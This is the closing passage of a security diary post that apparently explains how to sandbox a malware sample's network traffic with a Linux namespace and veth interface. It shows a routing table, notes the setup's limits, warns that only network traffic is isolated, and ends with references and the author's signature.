Window IRTT veth0 00000000 0200000A 0003 0 0 0 00000000 0 0 0 veth0 0000000A 00000000 0001 0 0 0 00FFFFFF 0 0 0 (0x0200000A = 10.0.0.2) Done! The current configuration is very basic and does not provide, amongst others, a DNS. Your sinkholed sample won't be able to resolve FQDN. Also, you could really route the packets by enabling ip_forward and NAT the traffic. WARNING: This is not a bullet-proof solution to perform malware analysis: Only the network traffic was isolated! [1] https://docs.kernel.org/filesystems/proc.html [2] https://en.wikipedia.org/wiki/Linux_namespaces Xavier Mertens (@xme) Xameco Senior ISC Handler - Freelance Cyber Security Consultant PGP Key
isc.sans.eduJul 25, 2025extracted